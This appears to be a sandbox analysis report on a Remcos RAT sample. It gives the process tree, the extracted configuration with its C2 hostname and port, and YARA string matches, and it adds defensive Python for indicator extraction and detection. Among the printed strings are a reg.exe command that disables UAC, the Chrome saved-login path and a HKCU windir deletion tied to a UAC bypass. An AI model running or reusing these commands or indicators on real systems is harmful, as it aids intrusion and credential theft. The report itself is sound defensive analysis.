
Windows Analysis Report ZfigYV6HXd

Overview

General Information

Sample Name: ZfigYV6HXd (renamed file extension from none to exe)
Analysis ID: 488388
MD5: 1a1a9b3969abcd2fccd2c6ce20be68ac
SHA1: 4aa438483d23766f72ba0f4e2bccb2dd30689845
SHA256: 80b539d191e840c8f421b2a1c34dcdd34961675d43d678d08b55d17f1e97fc63
Tags: 32, exe, trojan

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Machine Learning detection for sample
Injects a PE file into a foreign processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to inject code into remote processes
Contains functionality to change the wallpaper
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate processes and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Uses reg.exe to modify the Windows registry
Contains functionality to retrieve information about pressed keystrokes
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Process Tree

  • System is w10x64
  • ZfigYV6HXd.exe (PID: 3192 cmdline: 'C:\Users\user\Desktop\ZfigYV6HXd.exe' MD5: 1A1A9B3969ABCD2FCCD2C6CE20BE68AC)
    • logagent.exe (PID: 6224 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
    • cmd.exe (PID: 6272 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6332 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6408 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 6508 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Kkjczlm.exe (PID: 6396 cmdline: 'C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe' MD5: 1A1A9B3969ABCD2FCCD2C6CE20BE68AC)
    • mobsync.exe (PID: 6232 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)
  • Kkjczlm.exe (PID: 6604 cmdline: 'C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe' MD5: 1A1A9B3969ABCD2FCCD2C6CE20BE68AC)
    • logagent.exe (PID: 6200 cmdline: C:\Windows\System32\logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.2.1 Pro", "Host:Port:Password": "trapboijiggy.dvrlists.com:54614:1", "Assigned name": "Octopus", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Octopus-GM39UT", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
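The fields above map directly onto artifacts a responder can hunt for. The following is an added example written for this report (it is not Joe Sandbox or Remcos code): it parses the extracted configuration into C2 endpoints, the mutex, and the install, Run-key and keylog paths the agent would create. Three points are assumptions about the Remcos builder format rather than facts from the report: that several C2 entries in "Host:Port:Password" are separated by "|", that the path keyword "AppData" resolves to %APPDATA%, and that a "Keylog flag" of "0" means the keylogger is off. The caveat the code surfaces is worth stating: "Install flag" is "Disable", so the remcos.exe copy and the "Remcos" Run value are not expected on this host; the persistence seen in the process tree (Kkjczlm.exe under C:\Users\Public\Libraries) is consistent with the loader handling that itself.

```python
"""Derive indicators from the Remcos configuration the report extracted.

Added example for this report; it is not Joe Sandbox or Remcos code. The
configuration values are copied from the report. Assumptions about the
Remcos config format (not facts from the report): several C2 entries in
"Host:Port:Password" are separated by "|"; the path keyword "AppData"
resolves to %APPDATA%; "Keylog flag" == "0" means the keylogger is off.
"""

# Copied from the report's "Malware Configuration" section (abridged to the
# keys used below; no value was changed).
REMCOS_CONFIG = {
    "Version": "3.2.1 Pro",
    "Host:Port:Password": "trapboijiggy.dvrlists.com:54614:1",
    "Assigned name": "Octopus",
    "Install flag": "Disable",
    "Setup HKCU\\Run": "Enable",
    "Setup HKLM\\Run": "Disable",
    "Install path": "AppData",
    "Copy folder": "Remcos",
    "Copy file": "remcos.exe",
    "Startup value": "Remcos",
    "Mutex": "Octopus-GM39UT",
    "Keylog flag": "0",
    "Keylog path": "AppData",
    "Keylog folder": "remcos",
    "Keylog file": "logs.dat",
}

# Assumption: how the builder's path keywords map to environment variables.
PATH_KEYWORDS = {"AppData": "%APPDATA%"}

RUN_KEYS = {
    "Setup HKCU\\Run": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
    "Setup HKLM\\Run": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
}


def parse_c2_entries(field):
    """Split "host:port:password[|host:port:password...]" into tuples.

    Splitting from the right keeps a host that itself contains ':' intact
    as long as port and password are the last two fields.
    """
    entries = []
    for item in (s.strip() for s in field.split("|")):
        if not item:
            continue
        host, port, password = item.rsplit(":", 2)
        entries.append((host, int(port), password))
    return entries


def expected_artifacts(cfg):
    """Host-based artifacts the agent's own installer would leave behind.

    "Install flag" gates the copy and the Run value. For this sample it is
    "Disable", so install_path and run_values describe a build with
    installation turned on; the persistence in the report's process tree
    (Kkjczlm.exe under Users/Public/Libraries) is consistent with the loader
    handling that itself rather than the Remcos agent.
    """
    base = PATH_KEYWORDS.get(cfg["Install path"], cfg["Install path"])
    keylog_base = PATH_KEYWORDS.get(cfg["Keylog path"], cfg["Keylog path"])
    install_enabled = cfg.get("Install flag") == "Enable"
    configured_run_values = [
        f"{key}\\{cfg['Startup value']}"
        for setting, key in RUN_KEYS.items()
        if cfg.get(setting) == "Enable"
    ]
    return {
        "mutex": cfg["Mutex"],
        "install_enabled": install_enabled,
        "install_path": f"{base}\\{cfg['Copy folder']}\\{cfg['Copy file']}",
        # Assumption: the Run value is only written when installation is on.
        "run_values": configured_run_values if install_enabled else [],
        "configured_run_values": configured_run_values,
        "keylog_enabled": cfg.get("Keylog flag", "0") != "0",  # assumption: "0" = off
        "keylog_file": f"{keylog_base}\\{cfg['Keylog folder']}\\{cfg['Keylog file']}",
    }


def network_indicators(cfg):
    """C2 endpoints as 'host:port' strings for a blocklist or IDS rule."""
    return [f"{host}:{port}" for host, port, _ in parse_c2_entries(cfg["Host:Port:Password"])]


if __name__ == "__main__":
    for key, value in expected_artifacts(REMCOS_CONFIG).items():
        print(f"{key:22} {value}")
    print("c2:", network_indicators(REMCOS_CONFIG))
```

The configuration carries only the hostname; the 31.3.152.100:54614 connection in the Networking section is what that name resolved to during this run, so a network indicator built from the config should be paired with the resolved address at the time of the investigation rather than the one the sandbox saw.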

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\Public\Libraries\mlzcjkK.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
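The two matched strings sit at offsets 0x0 and 0x14: "[InternetShortcut]" is 18 bytes, so with a CRLF the "URL=" key is the very next line, meaning the dropped file is a minimal shortcut whose first key is its target. The report does not show that target, nor what triggers the file from C:\Users\Public\Libraries (which is not a Startup folder). The following is an added example for this report, not the rule's own code and not Joe Sandbox code, that parses .url files and applies the rule's methodology in code: flag any shortcut whose URL= is not a plain http(s) link. The sample contents are constructed; the one pointing at Kkjczlm.exe is a guess at what such a loader would write, not something the report states.

```python
"""Parse Windows Internet Shortcut (.url) files and flag non-web targets,
the case the Methodology_Contains_Shortcut_OtherURIhandlers rule is after.

Added example for this report, not the rule's code and not Joe Sandbox code.
The report shows only that C:/Users/Public/Libraries/mlzcjkK.url starts with
"[InternetShortcut]" and carries a "URL=" key; the sample contents below are
constructed, and the Kkjczlm.exe target is a guess, not a reported fact.
"""
import configparser
import re
from urllib.parse import urlsplit

# Drive-letter paths and UNC paths are local targets even without a scheme.
DRIVE_OR_UNC = re.compile(r"^([a-z]:[\\/]|\\\\)", re.I)


def parse_internet_shortcut(text):
    """Return the [InternetShortcut] section as a dict, or None if the text
    is not a shortcut. Key case is preserved (URL, IconFile, WorkingDirectory)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    if not cp.has_section("InternetShortcut"):
        return None
    return dict(cp["InternetShortcut"])


def classify_target(url):
    """'web' for http(s); 'local-path' for drive letters, UNC paths and file:;
    'other-handler:<scheme>' for anything the shell would hand to another
    registered URI handler."""
    url = url.strip()
    if DRIVE_OR_UNC.match(url):
        return "local-path"
    scheme = urlsplit(url).scheme.lower()
    if scheme in ("http", "https"):
        return "web"
    if scheme == "file":
        return "local-path"
    return f"other-handler:{scheme}" if scheme else "unknown"


def is_suspicious_shortcut(text):
    """True when the text is a shortcut whose URL= is not a plain web link."""
    section = parse_internet_shortcut(text)
    if not section or "URL" not in section:
        return False
    return classify_target(section["URL"]) != "web"


# Constructed samples. CRLF line endings reproduce the layout the report's
# offsets imply: "[InternetShortcut]" is 18 bytes, so with CRLF the next
# line, "URL=", begins at offset 0x14, exactly where the rule matched.
SAMPLES = {
    "benign.url": "\r\n".join(["[InternetShortcut]", "URL=https://onedrive.live.com/", ""]),
    "mlzcjkK.url": "\r\n".join([
        "[InternetShortcut]",
        "URL=file:///C:/Users/Public/Libraries/Kkjczlm/Kkjczlm.exe",  # constructed target
        "IconIndex=0",
        "",
    ]),
    "handler.url": "\r\n".join(["[InternetShortcut]", "URL=ftp://example.invalid/x", ""]),
    "notes.txt": "just some text, no section header",
}


def scan(samples):
    """Names of the samples that are shortcuts with a non-web target."""
    return sorted(name for name, text in samples.items() if is_suspicious_shortcut(text))


if __name__ == "__main__":
    for name in scan(SAMPLES):
        print("suspicious:", name)
```

The classifier deliberately reports every non-web handler, not only file: and drive paths, because the rule's point is methodological: a .url in a user-writable or auto-run location that does anything other than open a browser deserves a look, and the scheme tells you which handler to examine.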

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.519137260.0000000003017000.00000004.00000020.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp | REMCOS_RAT_variants | unknown | unknown
      • 0x606a4:$str_a1: C:\Windows\System32\cmd.exe
      • 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x5f87c:$str_b2: Executing file:
      • 0x607e8:$str_b3: GetDirectListeningPort
      • 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x60268:$str_b7: \update.vbs
      • 0x5f8cc:$str_b9: Downloaded file:
      • 0x5f8b8:$str_b10: Downloading file:
      • 0x5f8a0:$str_b12: Failed to upload file:
      • 0x607b0:$str_b13: StartForward
      • 0x607d0:$str_b14: StopForward
      • 0x60210:$str_b15: fso.DeleteFile "
      • 0x601a4:$str_b16: On Error Resume Next
      • 0x60240:$str_b17: fso.DeleteFolder "
      • 0x5f890:$str_b18: Uploaded file:
      • 0x5f90c:$str_b19: Unable to delete:
      • 0x601d8:$str_b20: while fso.FileExists("
      • 0x5fd61:$str_c0: [Firefox StoredLogins not found]
0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp | REMCOS_RAT_variants | unknown | unknown
        • 0x60e5f:$str_a1: C:\Windows\System32\cmd.exe
        • 0x60ddb:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x60ddb:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x603e3:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x60a3b:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x60037:$str_b2: Executing file:
        • 0x60fa3:$str_b3: GetDirectListeningPort
        • 0x607fb:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x60a23:$str_b7: \update.vbs
        • 0x60087:$str_b9: Downloaded file:
        • 0x60073:$str_b10: Downloading file:
        • 0x6005b:$str_b12: Failed to upload file:
        • 0x60f6b:$str_b13: StartForward
        • 0x60f8b:$str_b14: StopForward
        • 0x609cb:$str_b15: fso.DeleteFile "
        • 0x6095f:$str_b16: On Error Resume Next
        • 0x609fb:$str_b17: fso.DeleteFolder "
        • 0x6004b:$str_b18: Uploaded file:
        • 0x600c7:$str_b19: Unable to delete:
        • 0x60993:$str_b20: while fso.FileExists("
        • 0x6051c:$str_c0: [Firefox StoredLogins not found]
(13 further memory-dump matches not shown)

        Unpacked PEs

Source | Rule | Description | Author | Strings
28.2.mobsync.exe.740000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
28.2.mobsync.exe.740000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
          • 0x606a4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x60620:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x60620:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x5fc28:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x60280:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x5f87c:$str_b2: Executing file:
          • 0x607e8:$str_b3: GetDirectListeningPort
          • 0x60040:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x60268:$str_b7: \update.vbs
          • 0x5f8cc:$str_b9: Downloaded file:
          • 0x5f8b8:$str_b10: Downloading file:
          • 0x5f8a0:$str_b12: Failed to upload file:
          • 0x607b0:$str_b13: StartForward
          • 0x607d0:$str_b14: StopForward
          • 0x60210:$str_b15: fso.DeleteFile "
          • 0x601a4:$str_b16: On Error Resume Next
          • 0x60240:$str_b17: fso.DeleteFolder "
          • 0x5f890:$str_b18: Uploaded file:
          • 0x5f90c:$str_b19: Unable to delete:
          • 0x601d8:$str_b20: while fso.FileExists("
          • 0x5fd61:$str_c0: [Firefox StoredLogins not found]
32.2.logagent.exe.10590000.2.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
32.2.logagent.exe.10590000.2.raw.unpack | REMCOS_RAT_variants | unknown | unknown
            • 0x60e5f:$str_a1: C:\Windows\System32\cmd.exe
            • 0x60ddb:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x60ddb:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x603e3:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x60a3b:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x60037:$str_b2: Executing file:
            • 0x60fa3:$str_b3: GetDirectListeningPort
            • 0x607fb:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x60a23:$str_b7: \update.vbs
            • 0x60087:$str_b9: Downloaded file:
            • 0x60073:$str_b10: Downloading file:
            • 0x6005b:$str_b12: Failed to upload file:
            • 0x60f6b:$str_b13: StartForward
            • 0x60f8b:$str_b14: StopForward
            • 0x609cb:$str_b15: fso.DeleteFile "
            • 0x6095f:$str_b16: On Error Resume Next
            • 0x609fb:$str_b17: fso.DeleteFolder "
            • 0x6004b:$str_b18: Uploaded file:
            • 0x600c7:$str_b19: Unable to delete:
            • 0x60993:$str_b20: while fso.FileExists("
            • 0x6051c:$str_c0: [Firefox StoredLogins not found]
32.2.logagent.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
(31 further unpacked-PE matches not shown)

              Sigma Overview

              No Sigma rule has matched
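No rule in the shipped Sigma set fired, yet the process tree above has three behaviours that are cheap to detect from process-creation telemetry: batch files run from C:\Users\Public, reg.exe touching the windir value under HKCU\Environment, and a System32 binary started with a bare command line by an executable living under C:\Users (the shape process hollowing of logagent.exe and mobsync.exe takes here, matching the "Creates a process in suspended mode" and "Injects a PE file into a foreign processes" signatures). The following is an added example for this report, not Joe Sandbox or Sigma code, that runs that logic over events constructed from the tree: PIDs, images and command lines are as printed; parent images follow the tree's nesting, and explorer.exe as the parent of the top-level processes is an assumption. The reg.exe rule matches both add and delete on HKCU\Environment\windir because the page shows only the delete; that delete is consistent with cleanup after a %windir% hijack of an auto-elevating scheduled task, but the add is not on the page and is not assumed.

```python
"""Detection logic over process-creation events shaped like the report's
process tree.

Added example for this report, not Joe Sandbox or Sigma code. Events are
constructed from the tree: PIDs, images and command lines as printed, parent
images from the tree's nesting; explorer.exe as the parent of the top-level
processes is an assumption. Two benign events are included as controls.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path of the created process
    cmdline: str        # command line as logged
    parent_image: str   # full path of the creating process


USER_WRITABLE = re.compile(r"^c:\\users\\", re.I)
SYSTEM_DIR = re.compile(r"^c:\\windows\\(system32|syswow64)\\", re.I)
PUBLIC_BATCH = re.compile(r"c:\\users\\public\\[^\s'\"]*\.bat\b", re.I)
HKCU_ENV_WINDIR = re.compile(r"\b(hkcu|hkey_current_user)\\environment\b.*\bwindir\b", re.I)


def _image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_public_batch(ev):
    """cmd.exe running a .bat stored under Users/Public (Trast.bat, UKO.bat, nest.bat)."""
    return _image_name(ev.image) == "cmd.exe" and PUBLIC_BATCH.search(ev.cmdline) is not None


def rule_hkcu_environment_windir(ev):
    """reg.exe adding or deleting HKCU/Environment/windir. The tree shows only
    the delete; both directions are matched rather than assuming the add."""
    return _image_name(ev.image) == "reg.exe" and HKCU_ENV_WINDIR.search(ev.cmdline) is not None


def rule_hollowed_system_binary(ev):
    """A System32/SysWOW64 image launched by something under Users with a bare
    command line (no arguments): the shape of a process created suspended so
    its image can be replaced."""
    if not SYSTEM_DIR.match(ev.image) or not USER_WRITABLE.match(ev.parent_image):
        return False
    return ev.cmdline.strip().strip('"\'').lower() == ev.image.lower()


RULES = {
    "public_batch": rule_public_batch,
    "hkcu_environment_windir": rule_hkcu_environment_windir,
    "hollowed_system_binary": rule_hollowed_system_binary,
}


def evaluate(events):
    """Return (rule_name, pid) for every rule each event trips."""
    return [(name, ev.pid) for ev in events for name, rule in RULES.items() if rule(ev)]


SAMPLE = r"C:\Users\user\Desktop\ZfigYV6HXd.exe"
COPY = r"C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe"
CMD = r"C:\Windows\system32\cmd.exe"

# Constructed from the report's process tree, plus two benign controls.
EVENTS = [
    ProcEvent(3192, SAMPLE, f"'{SAMPLE}'", r"C:\Windows\explorer.exe"),  # parent assumed
    ProcEvent(6224, r"C:\Windows\System32\logagent.exe", r"C:\Windows\System32\logagent.exe", SAMPLE),
    ProcEvent(6272, CMD, CMD + r' /c "C:\Users\Public\Trast.bat" ', SAMPLE),
    ProcEvent(6332, CMD, CMD + r" /K C:\Users\Public\UKO.bat", CMD),
    ProcEvent(6408, CMD, CMD + r' /c "C:\Users\Public\nest.bat" ', SAMPLE),
    ProcEvent(6508, r"C:\Windows\system32\reg.exe", r"reg delete hkcu\Environment /v windir /f", CMD),
    ProcEvent(6396, COPY, f"'{COPY}'", r"C:\Windows\explorer.exe"),  # parent assumed
    ProcEvent(6232, r"C:\Windows\System32\mobsync.exe", r"C:\Windows\System32\mobsync.exe", COPY),
    # controls: a service host with arguments; a user's own script outside Public
    ProcEvent(900, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs",
              r"C:\Windows\System32\services.exe"),
    ProcEvent(901, CMD, CMD + r' /c "C:\Users\user\src\build.bat"', r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for name, pid in evaluate(EVENTS):
        print(f"{name:26} pid={pid}")
```

The three predicates map one-to-one onto Sigma's process_creation fields (Image, CommandLine, ParentImage), so each can be lifted into a rule with the same selections. The hollowing heuristic is the one that needs tuning in production: legitimate installers under C:\Users do launch System32 helpers, so scope it to images that normally never run with an empty command line, or pair it with the sandbox's own "Creates a process in suspended mode" observation from an EDR that records the creation flags.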

              Jbx Signature Overview


              AV Detection:

Found malware configuration
Source: 32.2.logagent.exe.105919bb.1.raw.unpack | Malware Configuration Extractor: Remcos (full configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: ZfigYV6HXd.exe | Virustotal: Detection: 31%
Source: ZfigYV6HXd.exe | ReversingLabs: Detection: 26%
Yara detected Remcos RAT
Source: Yara match | File source: 28.2.mobsync.exe.740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.mobsync.exe.740000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.mobsync.exe.10590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.mobsync.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.logagent.exe.105919bb.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.logagent.exe.10590000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.logagent.exe.105919bb.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.logagent.exe.105919bb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.mobsync.exe.105919bb.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.logagent.exe.105919bb.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.2.mobsync.exe.105919bb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.logagent.exe.10590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.519137260.0000000003017000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.417356547.0000000002D18000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.437204734.0000000003297000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: logagent.exe PID: 6224, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mobsync.exe PID: 6232, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: logagent.exe PID: 6200, type: MEMORYSTR
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe | ReversingLabs: Detection: 26%
Machine Learning detection for sample
Source: ZfigYV6HXd.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 32.2.logagent.exe.10590000.2.unpack | Avira: Label: TR/Dropper.Gen
Source: 14.0.logagent.exe.10590000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.0.mobsync.exe.10590000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.0.mobsync.exe.10590000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.0.mobsync.exe.10590000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.logagent.exe.10590000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.0.mobsync.exe.10590000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.logagent.exe.10590000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.logagent.exe.10590000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.logagent.exe.10590000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.2.mobsync.exe.10590000.2.unpack | Avira: Label: TR/Dropper.Gen
Source: 32.0.logagent.exe.10590000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 32.0.logagent.exe.10590000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.logagent.exe.10590000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.2.logagent.exe.10590000.1.unpack | Avira: Label: TR/Dropper.Gen
Further sources (crypto API use, static PE flags, file enumeration):
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0042E5CA CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 28_2_0076E5CA CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: logagent.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: ZfigYV6HXd.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 14_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
